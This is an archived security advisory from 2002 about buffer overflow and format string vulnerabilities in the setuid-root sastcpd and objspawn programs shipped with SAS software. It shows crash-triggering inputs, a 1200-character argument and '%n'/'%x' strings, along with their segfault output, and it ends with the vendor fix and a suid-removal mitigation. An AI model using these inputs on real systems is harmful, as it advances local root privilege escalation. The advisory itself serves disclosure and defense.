TUCoPS :: Unix :: Various Flavours :: misc5047.htm

sas - sastcpd Buffer Overflow and Format String Vulnerabilities
30th Jan 2002 [SBWID-5047]

	sastcpd Buffer Overflow and Format String Vulnerabilities


	SAS Job Spawner for Open Systems version 8.01


	In Digital Shadow advisory [http://www.ministryofpeace.co.uk] :

	Since sastcpd is installed uid 0 by default, full  root  privileges  can
	be obtained through exploitation of either of the vulnerabilities  below


	$ sastcpd `perl -e \"print \'A\' x 1200\"`

	Invalid argument: AAAA[..cut..]AAAA.

	Segmentation fault (core dumped)

	$ ls -la core

	-rw-------  1 root    teknix     1454382 Jan  28 04:22 core


	$ sastcpd %n

	Segmentation fault (core dumped)


	$ sastcpd %x

	Invalid argument: 2.



	\"Ellipse\" added :

	It appears that the objspawn program included with  the  SAS/Integration
	Technologies product is also vulnerable to these bugs. objspawn is  also
	a setuid root executable  by  default.  See  the  above  link  for  more


	SAS Support say that these problems were fixed in version 8.2



	Also, removing the suid bit seems to solve the problem without  breaking
	the software

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH